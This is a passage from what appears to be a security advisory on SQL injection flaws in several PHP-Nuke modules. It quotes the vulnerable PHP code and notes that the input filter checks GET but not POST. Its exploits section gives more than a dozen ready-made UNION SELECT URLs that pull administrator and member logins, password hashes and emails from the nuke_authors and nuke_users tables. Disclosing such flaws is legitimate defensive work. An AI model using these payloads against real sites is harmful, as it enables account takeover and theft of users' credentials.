| "
." "._USER.": $ratinguser"
[...]
echo " $ratingcomments"
[...]
}
[...]
function viewlinkeditorial($lid, $ttitle) {
[...]
$result=sql_query("SELECT adminid, editorialtimestamp, editorialtext,
editorialtitle FROM ".$prefix."_links_editorials WHERE linkid = $lid",
$dbi);
$recordexist = sql_num_rows($result, $dbi);
[...]
if ($recordexist != 0) {
while(list($adminid, $editorialtimestamp, $editorialtext,
$editorialtitle)=sql_fetch_row($result, $dbi)) {
$editorialtitle = stripslashes($editorialtitle); $editorialtext =
stripslashes($editorialtext);
[...]
echo " " ."$editorialtext"; [...] } [...] switch($l_op) { [...] case "viewlink": viewlink($cid, $min, $orderby, $show); break; case "brokenlink": brokenlink($lid); break; [...] case "visit": visit($lid); break; case "rateinfo": rateinfo($lid, $user, $title); break; [...] case "viewlinkcomments": viewlinkcomments($lid, $ttitle); break; [...] case "viewlinkeditorial": viewlinkeditorial($lid, $ttitle); break; [...] } ?> ---------------------------------------------------- In every functions we can see an SQL request of the type : select title,parentid from ".$prefix."_links_categories where cid=$cid Once executed, an element of this request is shown to the user. If, in this case with thefonction viewlink(), we give to $cid the value : 0 UNION SELECT pwd,0 FROM nuke_authors The executed SQL request will be then : select title,parentid from nuke_links_categories where cid=0 UNION SELECT pwd,0 FROM nuke_authors We are thus going to go to look for in the table nuke_links_categories fields title and parentid where $cid is worth 0. However, this category does not exist. We are then going to look for in the table nuke_authors the field "pwd". This table contains all the informations about the administrators, the passwords (pwd) being encrypted. The displaying will not be the name of the category, but the coded password of an administrator. The seconds vulnerabilities has been discovered in the /modules/Downloads/index.php file. Vulnerable code : ---------------------------------------------------- function viewdownload($cid, $min, $orderby, $show) { [...] $result2 = sql_query("SELECT cid, title, cdescription FROM ".$prefix."_downloads_categories WHERE parentid=$cid order by title", $dbi); $count = 0; while(list($cid2, $title2, $cdescription2) = sql_fetch_row($result2, $dbi)) { $cresult = sql_query("SELECT * FROM ".$prefix."_downloads_downloads WHERE cid=$cid2", $dbi); $cnumrows = sql_num_rows($cresult, $dbi); echo " | · $t
itle2
($cnumrows)";
[...]
if ($cdescription2) {
echo "$cdescription2 "; } else { echo " "; } [...] } [...] function getit($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi); $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] function viewdownloadeditorial($lid, $ttitle) { [...] $result=sql_query("SELECT adminid, editorialtimestamp, editorialtext, editorialtitle FROM ".$prefix."_downloads_editorials WHERE downloadid = $lid", $dbi); $recordexist = sql_num_rows($result, $dbi); [...] if ($recordexist != 0) { while(list($adminid, $editorialtimestamp, $editorialtext, $editorialtitle)=sql_fetch_row($result, $dbi)) { [...] echo " " ."$editorialtext"; [...] } [...] } [...] function viewdownloadcomments($lid, $ttitle) { [...] $result=sql_query("SELECT ratinguser, rating, ratingcomments, ratingtimestamp FROM ".$prefix."_downloads_votedata WHERE ratinglid = $lid AND ratingcomments != '' ORDER BY ratingtimestamp DESC", $dbi); [...] while(list($ratinguser, $rating, $ratingcomments, $ratingtimestamp)=sql_fetch_row($result, $dbi)) { [...} echo " | |
| " ." "._USER.": $ratinguser" ." | " ."" .""._RATING.": $rating" ." | " ."" ."$formatted_date" ." | " ."
| " .""._USERAVGRATING.": $useravgrating" ." | " ."" .""._NUMRATINGS.": $usertotalcomments" ." | " ."|
| "
."";
[...]
}
[...]
}
[...]
}
[...]
function modifydownloadrequest($lid) {
[...]
if ($blocknow != 1) {
$result = sql_query("SELECT cid, title, url, description, name, email,
filesize, version, homepage FROM ".$prefix."_downloads_downloads WHERE
lid=$lid", $dbi);
echo " "; while(list($cid, $title, $url, $description, $auth_name, $email, $filesize, $version, $homepage) = sql_fetch_row($result, $dbi)) { $title = stripslashes($title); $description = stripslashes($description); echo " " .""._DOWNLOADNAME.": " .""._URL.": " .""._DESCRIPTION.": "; $result2=sql_query("SELECT cid, title FROM ".$prefix."_downloads_categories order by title", $dbi); echo "" ."" .""._CATEGORY.": " .""._AUTHORNAME.": " .""._AUTHOREMAIL.": " .""._FILESIZE.": ("._INBYTES.") " .""._VERSION.": " .""._HOMEPAGE.": " ."" .""; } } [...] } [...] function rateinfo($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi); $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] switch($d_op) { [...] case "viewdownload": viewdownload($cid, $min, $orderby, $show); break; [...] case "modifydownloadrequest": modifydownloadrequest($lid); break; [...] case "getit": getit($lid); break; [...] case "rateinfo": rateinfo($lid, $user, $title); break; [...] case "viewdownloadcomments": viewdownloadcomments($lid, $ttitle); break; [...] case "viewdownloadeditorial": viewdownloadeditorial($lid, $ttitle); break; [...] } ?> ---------------------------------------------------- We can again notice that in every functions we can see that the SQL request containing a modifiable variable is not filtered. To note that in all this case, and contrary to the usual cases of injection SQL, these problems are present as well when magic_quotes_gpc is ON or OFF. The same problems have been also discovered in the /modules/Sections/index.php file. In mainfile.php file we can see the following code : ---------------------------------------------------- foreach ($_GET as $secvalue) { if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) || (eregi("\([^>]*\"?[^)]*\)", $secvalue)) || (eregi("\"", $secvalue))) { die ("I don't like you..."); } } foreach ($_POST as $secvalue) { if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style*\"?[^>]*>", $secvalue))) { Header("Location: index.php"); die(); } } ---------------------------------------------------- As we can see, although GET requests are filtered, POST requests aren't. It is thus possible to use the brackets in SQL injection by using a form. 3. EXPLOITS ====================================================================== - SQL Injection : - http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20 SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2 - Will display both encrypted passwords of the administrator : http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL ECT%20pwd,0%20FROM%20nuke_authors More information is available at : http://www.security.nnov.ru/search/document.asp?docid=5201 Apparently this fault was already announced, but considering that it was discovered in same times of the others we decided to make a description here. - http://[target]/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION %20SELECT%201,aid,name,pwd%20FROM%20nuke_authors Display the login, the name and the password of an administrator if the link 0 does not exist. - http://[target]/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20 SELECT%20pwd%20FROM%20nuke_authors Re-steer towards the encrypted password. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20 UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* Display all the logins administrator as well as their encrypted passwords. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 %20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors Display logins, names and encrypted passwords of all the administrators. - http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20 UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/* Display all the pseudos of the users, followed by their encrypted password. - http://[target]/modules.php?name=Downloads&d_op=modifydownloadrequest& lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name, user_email,user_level,0,0%20FROM%20nuke_users Display logins, ID, encrypted passwords, names, emails and levels of all the registered members. - http://[target]/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 - http://[target]/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 Re-steer towards the encrypted password of the user id of which is 5. - http://[target]/modules.php?name=Downloads&d_op=viewdownloadcomments& lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20 FROM%20nuke_users/* http://[target]/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1 %20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users Display logins, ID and encrypted password of all the members. - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%20pwd%20FROM%20nuke_authors - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/* - http://[target]/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20 SELECT%20aid,pwd%20FROM%20nuke_authors http://[target]/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20 SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors - http://[target]/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20 SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho rs/* - FORM : --------------------PHPNUKEexploit1.html-------------------- A patch can be found on phpSecure.info A patch can be found on phpSecure.info A patch can be found on phpSecure.info |